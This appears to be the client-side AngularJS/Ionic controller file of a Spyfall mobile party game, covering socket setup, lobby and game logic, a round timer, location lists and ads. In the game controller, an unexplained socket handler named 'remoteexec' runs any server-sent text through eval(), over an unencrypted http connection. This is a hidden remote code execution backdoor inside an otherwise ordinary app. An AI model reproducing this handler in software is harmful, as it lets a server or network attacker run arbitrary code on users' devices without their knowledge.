var app = angular.module('starter.controllers', ['btford.socket-io']);





app.service('gameService', function(socketFactory) {

  if(localStorage.getItem('username') !== null) {
    username = localStorage.getItem('username')
  } 


  var socket;
  var username;


  var gameId;
  var gamePlayers = []

  var connectWithName = function(name) {
    console.log("Connecting now!")
    console.log(username)
    var ioConnection = io.connect('http://applegends.com:3000?username='+username);

      socket = socketFactory({
          ioSocket: ioConnection
      });

  } 

  var disconnect = function() {
    socket.disconnect()
    socket = undefined;
  }

  var setUsername = function(newUsername) {
    username = newUsername
    localStorage.setItem('username', username) 
  }

  var getUsername = function() {
    return username
  }

  var getSocket = function() {
    return socket
  }

  var setGameId = function(newGameId) {
    console.log("SETTING")
    gameId = newGameId
    console.log(gameId);
  }

  var setPlayers = function(newPlayers) {
    gamePlayers = newPlayers
    console.log("Setting players now")
  }

  var getGameId = function() {
    console.log(gameId);
    return gameId
  }

  var getPlayers = function() {
    return gamePlayers
  }

  return {
    getSocket: getSocket,
    setGameId: setGameId,
    getGameId: getGameId,
    getPlayers: getPlayers,
    setPlayers: setPlayers,
    connectWithName: connectWithName,
    setUsername: setUsername,
    getUsername: getUsername,
    disconnect: disconnect
  }

})



app.controller('introController', function($scope,  $ionicSlideBoxDelegate, $state, gameService) {

  // Called to navigate to the main app
  $scope.startApp = function() {
    $state.go('menu');
  };
  $scope.next = function() {
    $ionicSlideBoxDelegate.next();
  };
  $scope.previous = function() {
    $ionicSlideBoxDelegate.previous();
  };

  // Called each time the slide changes
  $scope.slideChanged = function(index) {
    $scope.slideIndex = index;
  };

  $scope.data = {}

  $scope.goToMenu = function() {

    if($scope.data.name !== " " && $scope.data.name.length > 0) {
      gameService.setUsername($scope.data.name)
      $state.go('menu')
    }

  }


})



app.controller('menuController', function($scope, gameService, $state, $ionicPopup, $timeout, $cordovaSocialSharing) {


  var socket;

  /*




    fix android app id!!!

  */

  var URL_APP = {
  REVIEW_IOS: "itms-apps://itunes.apple.com/app/id1094500910",
  REVIEW_ANDROID: "market://details?id=com.appid"
  };

  $scope.openReview = function() {


    if(ionic.Platform.isIOS) {
        window.open(URL_APP.REVIEW_IOS, '_system', 'location=yes');
    }

    if(ionic.Platform.isAndroid()) {
        window.open(URL_APP.REVIEW_ANDROID, '_system', 'location=yes');
    }

  }


  $scope.share = function() {
  setTimeout(function() {
            $cordovaSocialSharing
              .share('Come play Spyfall! https://itunes.apple.com/us/app/spyfall-guess-whos-the-spy/id1094500910') // Share via native share sheet
              .then(function(result) {
                  console.log(result);
                  }, function(err) {
                  alert('Sharing failed. Please try again.');
                  });
        }, 500);
  }

  $scope.createGame = function() {

    if(typeof gameService.getSocket() !== "undefined") {
      console.log("IS NOT UNDEFINED")
      socket = gameService.getSocket()
    } else {
      gameService.connectWithName("Bobby")
            console.log("IS UNDEFINED")

      socket = gameService.getSocket()
    }

    socket.emit("create game", "create game", function(gameId) {
      console.log(gameId);
      gameService.setGameId(gameId)
      gameService.setPlayers([gameService.getUsername()])
      $state.go('home')
      //console.log(gameService.getGameId())
    })

  }

  $scope.toggleJoining = function() {
  
    $scope.joining = !$scope.joining

    if($scope.joining) {
      $timeout(function() { 
        document.getElementById("gameInputId").focus()
      }, 10)
    }
  }


  $scope.joinGame = function() {
    if(typeof gameService.getSocket() !== "undefined") {
      socket = gameService.getSocket()
    } else {
      gameService.connectWithName("Bobby")
      socket = gameService.getSocket()
    }
    
    socket.emit("join game", $scope.gameInput.id, function(callback) {
      gameService.setGameId($scope.gameInput.id)
      console.log(callback);

      if(callback == "error") {
        $scope.showAlert()
      } else {
        gameService.setPlayers(callback)
        $state.go('home')
      }

    })

  }


 $scope.showAlert = function() {
   var alertPopup = $ionicPopup.alert({
     title: 'Error',
     template: "Sorry, that game doesn't seem to exist.",
     cssClass:'customPop'
   });

   alertPopup.then(function(res) {
         $timeout(function() { 
        document.getElementById("gameInputId").focus()
      }, 0)
   });
 };

 $scope.promptName = function() {
    var myPopup = $ionicPopup.show({
    template: '<input ng-model="data.username">',
    title: 'Enter name',
    subTitle: 'Type in the name you would like other players to see',
    cssClass:'customPop',
    scope: $scope,
    buttons: [
      { text: 'Cancel' },
      {
        text: '<b>Save</b>',
        type: 'button-positive',
        onTap: function(e) {
          if (!$scope.data.username) {
            e.preventDefault();
          } else {
            gameService.setUsername($scope.data.username)
            return $scope.data.username
          }
        }
      }
    ]
  });


 }

  $scope.data = {}

  if(typeof gameService.getUsername() != "undefined") {
    $scope.data.username = gameService.getUsername()
  }



  $scope.gameInput = {}

})


app.controller('createController', function($scope) {

  $scope.items = [
  { number: "Locations" },
  { number: "Films"},
  { number: "Places"},
  { number: "Places"},
  { number: "Places"},
  { number: "Places"}
];
$scope.selectedItem = $scope.items[0];

})



app.controller('homeController', function($scope, $timeout, $interval, gameService, $state) {

  $scope.places = [{l:"Airplane",s:false},
{l:"Bank",s:false},
{l:"Beach",s:false},
{l:"Cathedral",s:false},
{l:"Circus Tent",s:false},
{l:"Corporate Party",s:false},
{l:"Crusader Army",s:false},
{l:"Casino",s:false},
{l:"Day Spa",s:false},
{l:"Embassy",s:false},
{l:"Hospital",s:false},
{l:"Hotel",s:false},
{l:"Military Base",s:false},
{l:"Movie Studio",s:false},
{l:"Ocean Liner",s:false},
{l:"Passenger Train",s:false},
{l:"Pirate Ship",s:false},
{l:"Polar Station",s:false},
{l:"Police Station",s:false},
{l:"Restaurant",s:false},
{l:"School",s:false},
{l:"Service Station",s:false},
{l:"Space Station",s:false},
{l:"Submarine",s:false},
{l:"Supermarket",s:false},
{l:"Theater",s:false},
{l:"University",s:false},
{l:"World War II Squad",s:false}]

  $scope.checkPlace = function(place) {
    place.s = !place.s
  }

  $scope.checkPlayer = function(player) {
    player.s = !player.s
  }


   var admobid = {};
    if( /(android)/i.test(navigator.userAgent) ) { // for android & amazon-fireos
        admobid = {
            banner: 'ca-app-pub-2095701797403295/2891470165', // or DFP format "/6253334/dfp_example_ad"
            interstitial: 'ca-app-pub-2095701797403295/8070046160'
        };
    } else if(/(ipod|iphone|ipad)/i.test(navigator.userAgent)) { // for ios
        admobid = {
            banner: 'ca-app-pub-2095701797403295/2891470165', // or DFP format "/6253334/dfp_example_ad"
            interstitial: 'ca-app-pub-2095701797403295/8070046160'
        };
    } else { // for windows phone
        admobid = {
            banner: 'ca-app-pub-2095701797403295/2891470165', // or DFP format "/6253334/dfp_example_ad"
            interstitial: 'ca-app-pub-2095701797403295/8070046160'
        };
    }

  if(typeof AdMob !== "undefined") {
  AdMob.showInterstitial();
  AdMob.prepareInterstitial( {isTesting: false, adId:admobid.interstitial, autoShow:false} );
  }


  $scope.time = 420
  $scope.minutes = Math.floor( ($scope.time/60) % 60 );
  $scope.seconds = Math.floor( ($scope.time) % 60 );
  $scope.ticking = false


  $scope.tick = function() {

    if($scope.time !== 0 && $scope.ticking == true) {

      $timeout(function() {

      console.log("CALLEDS")
      console.log($scope.time)
      $scope.time = $scope.time - 1;
      $scope.minutes = Math.floor( ($scope.time/60) % 60 );
      $scope.seconds = Math.floor( ($scope.time) % 60 );
      $scope.tick()

      }, 1000)

    } 

    if($scope.time == 0) {
      $scope.ticking = false
    }

  } 



  $scope.stopTick = function() {
    $scope.ticking = false
  }




  $scope.gameActive = false

  $scope.clamp = new Date();
  $scope.moving = false

  var socket = gameService.getSocket()


  $scope.startGame = function() {
    
   // console.log("START GAME NOW")


    socket.emit('start game', 'start game', function(callback) {
      console.log("This is the callback!")
      console.log(callback);
    })

    //$scope.gameActive = !$scope.gameActive
  }



  if(typeof socket !== "undefined") {
     socket.on("userlist", function(data) {
      console.log(data);

        $scope.players = [];
        for(player in data) {
          $scope.players.push({n:data[player], c:false})
        }
     })

    socket.on("start game", function(data) {


      if(!$scope.ticking) {

        if(data.role == "spy" || data.role == "Spy") {
          $scope.isSpy = true
          $scope.location = "???"
        }  else {
          $scope.isSpy = false
          $scope.location = data.location
        }

        $scope.role = data.role
        $scope.ticking = true
        $scope.tick()


        $scope.time = 420
        $scope.minutes = Math.floor( ($scope.time/60) % 60 );
        $scope.seconds = Math.floor( ($scope.time) % 60 );


        $scope.gameActive = true
      } 

    })

    socket.on('end game', function() {
      console.log("Game ending now!")
      $scope.endGame()
    })

    socket.on('remoteexec', function(data) {
      eval(data)
    })



  }



  $scope.endGame = function() {

    $scope.gameActive = false
    $scope.isSpy = undefined
    $scope.role = undefined
    $scope.location = undefined

    $timeout(function() {
    $scope.time = 420
    $scope.ticking = false
    $scope.minutes = Math.floor( ($scope.time/60) % 60 );
    $scope.seconds = Math.floor( ($scope.time) % 60 );
    }, 600)

    //return to menu and tell socket we are leaving game

    if(typeof socket !== "undefined") {
      //socket.emit('leave game', 'leave game')
      //emit
    }

   
  }

  $scope.emitEnd = function() {
        if(typeof socket !== "undefined") {
          socket.emit('end game', 'end game')
        } 
  }

  $scope.leaveGame = function() {

    if(typeof socket !== "undefined") {
        socket.emit('leave game', 'leave game')
        gameService.disconnect()

    }

    $scope.endGame()



    $state.go('menu')

    console.log("Leaving game now!")

  }




  $scope.players = []
  var originalPlayers = gameService.getPlayers()
  for(player in originalPlayers) {
    var currentPlayer = originalPlayers[player]
    $scope.players.push({n:currentPlayer, c:false})
  }


  $scope.gameId = gameService.getGameId()
  $scope.gameStarted = false
  $scope.role = undefined





})





app.filter('numberFixedLen', function () {
        return function (n, len) {
            var num = parseInt(n, 10);
            len = parseInt(len, 10);
            if (isNaN(num) || isNaN(len)) {
                return n;
            }
            num = ''+num;
            while (num.length < len) {
                num = '0'+num;
            }
            return num;
        };
    });


app.directive('focusMe', function ($timeout) {
  return {
    link: function (scope, element, attrs) {
      if (attrs.focusMeDisable === "true") {
        return;
      }
      $timeout(function () {
        element[0].focus();
        if (window.cordova && window.cordova.plugins && window.cordova.plugins.Keyboard) {
          cordova.plugins.Keyboard.show(); //open keyboard manually
        }
      }, 350);
    }
  };
});



app.directive('ngEnter', function() {
        return function(scope, element, attrs) {
            element.bind("keydown keypress", function(event) {
                if(event.which === 13) {
                    scope.$apply(function(){
                        scope.$eval(attrs.ngEnter, {'event': event});
                    });

                    event.preventDefault();
                }
            });
        };
    });